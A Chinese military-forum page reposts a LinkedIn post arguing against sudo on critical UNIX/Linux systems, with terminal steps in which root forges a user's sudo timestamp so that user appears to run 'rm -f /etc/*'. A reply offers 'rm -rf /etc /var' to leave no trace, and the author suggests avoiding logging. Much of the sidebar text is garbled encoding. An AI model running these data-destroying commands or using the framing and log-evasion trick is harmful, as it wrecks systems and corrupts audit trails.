为何您不该在关键UNIX/Linux系统上使用sudo-世界军事论坛-军事论坛-世界论坛网（电脑版）

送交者: 2017年11月24日03:26:58 于 [世界军事论坛] 发送悄悄话

以下是本人在Linkedin发的一个帖子：

I know sudo has many security issues along the years, and this is just one problem that's bad enough.
Here is the example attacker could use it to do bad things:
On one window:
root@analy:/$ tty
/dev/pts/1
root@analy:~$ su wgong
wgong@analy:/$

On another window:
root@analy:sudo$ pwd
/var/run/sudo
root@analy:sudo$ ls
_pam_timestamp_key caburiar davidn gagans jawadk nickc ponnusva sohenoor veeral zhoub
amirm chaumong eladn gambhisr jeesuna oswaldod qualys-scan sysadmin warrene
badris couttsa feroza gawalis jeffc pavlenkoi root taddm wgong
bobv covim forrestl greeffn minaa pomfretj silvae tothp zhens
root@analy:sudo$ touch wgong/1

Then on 1st window,
wgong@analy:/$ sudo bash
root@analy:/# rm -f /etc/*

Of course, you need to develop a simple C program to do the equivalent thing "su wgong" does to avoid being logged.

100%(36)

0%(0)

请注意，当wgong用户运行sudo时, - ausec 11/24/17 (663)

第一，超级用户想搞破坏还需这么麻烦？第二，sodo -v - 敌营十八年 11/24/17 (748)

回答 - ausec 11/24/17 (686)

cd / && rm -rf /etc /var 不露痕迹。 /无内容 - 敌营十八年 11/24/17 (604)

将/var删除会破坏这种攻击嫁祸于人的目的 - ausec 11/24/17 (607)

缁楋拷閸氾拷 (韫囧懘鈧銆�):

鐎碉拷閻拷 (韫囧懘鈧銆�):

濞夈劌鍞介弬鎵暏閹达拷

标题 (必选项):

内容 (选填项):

	实用资讯

北美最大最全的折扣机票网站
美国名厂保健品一级代理,花旗参,维他命,鱼油,卵磷脂,30天退货保证.买百免邮.

	发布新帖		论坛文库		忘记密码
	树型版		修改密码		版主公告

一周点击热帖

更多>>

1	姒涙垶顒熸竟顐︹敋閸掑府绱掗崗銊︽煀濮濓拷-20娴滎喚娴夐敍宀€绶ㄩ崶锟�	eastwest
2	婢额亞鐛婇悞璁圭磼閸╁啫寮风€规ê顓洪柌鍥枠娑擃厼娴楃痪銏℃-9	eastwest
3	娑撯偓婢圭檼-POP閻愬憡鏌囨禍鍡涚叐閸ヨ姤鏋冮崠鏍ㄦ付閸氬海娈戦懘锟�	eastwest
4	瀹告潙鍟楅崜宥呭棘鐠嬪鏆遍敍姘毊閽€钘夊祪鎼达腹鈧粓妯€妞嬪簶鈧拷	eastwest
5	閳ユ粎绶ㄩ崶鎴掔闁偓閸愬秹鈧偓閿涘矁绻栭柌灞肩瘍鐟曚浇顔€缂佹瑤鑵�	eastwest
6	瀹告繃娅橀幀鎺撴灱閿涙矮缍橀幀搴濈疄閼虫垝淇婃稉顓炴禇鏉╂瑧顫掗崸锟�	eastwest
7	娑撳鍦洪惄鎾偓姘吂濮圭喎褰涢敍灞筋嚠娑擃厼娴楅弸浣疯礋闁插秷顩�	eastwest
8	濮濓絽绱＄憗鍛槵闁劑妲﹂敍锟� zt	eastwest
9	閸楁澘瀹抽幈灞肩啊閿涙岸妫舵０妯瑰紬闁插稄绱濆锝勭瑢娑擃厼娴楅幒锟�	eastwest
10	娑撳鎽滄潻娆愵偧閻喓娈戠挧銏ゅく娴滃棴绱�	eastwest

一周回复热帖

1	婵″倷缍嶇€电銈块弬閫涘悏閸欒尪顔戞稉鈧崜鎴濈殱閸犲绱�	eastwest
2	娑旂喕顕╂稉杞扮矆娑斿牆绻€妞よ寮界€靛厜鈧粏銈块弬閫涘悏閸欒尪顔�	eastwest
3	閼诲繗浠堢紘搴℃禇閻ㄥ嫯鈥滅拹銉ゅ瘜鐟曚焦妲搁崚璺哄娑撳秷顢戞潻锟�	eastwest
4	鏉╂瑤閲滈幁璺哄А閸忓牅绶ラ敍灞惧灉娴狀剙鍠呮稉宥堝厴缂佹瑨绉洪崡锟�	eastwest
5	閵嗘劒绺块弬鐟版礀閹插爼瀵楅妴鎴犵癌111.閸楁澘瀹抽惃鍕┾偓灞炬緟	eastwest
6	娑擃厼娴楁稉杞扮秿閺冪姵纭堕幍鈺佺炊閸掓壆绱栭崠妤嬬礉閹垫捇鈧艾宓�	eastwest
7	娑撳啩绔锋禍瀣綁閸撳稄绱濇稉顓炴禇濮ｆ柧绱涢張妤冪崼閸ュ﹣绔撮惂锟�	eastwest
8	娑撹桨绮堟稊鍫ュ亝娑斿牆顦挎禍鍝勬躬妤犲倷绱涢張锟� 閸楁潙绶㈢亸鎴︾崑	eastwest
9	閻楄婀曢弲顔剧崐閻掕泛顓虹敮鍐洣鐎电绻橀崣锝堝祩閸濅礁绶涢弨锟�	eastwest
10	閺堚偓閺傛壆澧楁稊婵嗗嬀缁狙冨坊閸欒尪顕抽張顒婄礉閹垫捁鍔憲鎸庢煙	eastwest

历史上的今天：回复热帖

2016:	中国第一次没收新加坡的军用设备：做掉
2016:	彭丽媛舅告别式》采访侧记－盐商之子变
2015:	这新闻，简单的过分了（图）
2015:	土耳其在边境地区击落入侵战机俄国防部
2014:	永暑岛就地取土能填多大？
2014:	创立中国人自己的宗教，抗衡西方的各种
2013:	陸劃防空識別區美国务院、白宫和五角大
2013:	BBC: 日本“严重抗议”中国设东海防空识
2012:	军报：首批5名飞行员驾歼15完成在航母起
2012:	官方J15起降航母高清照片出炉了！！！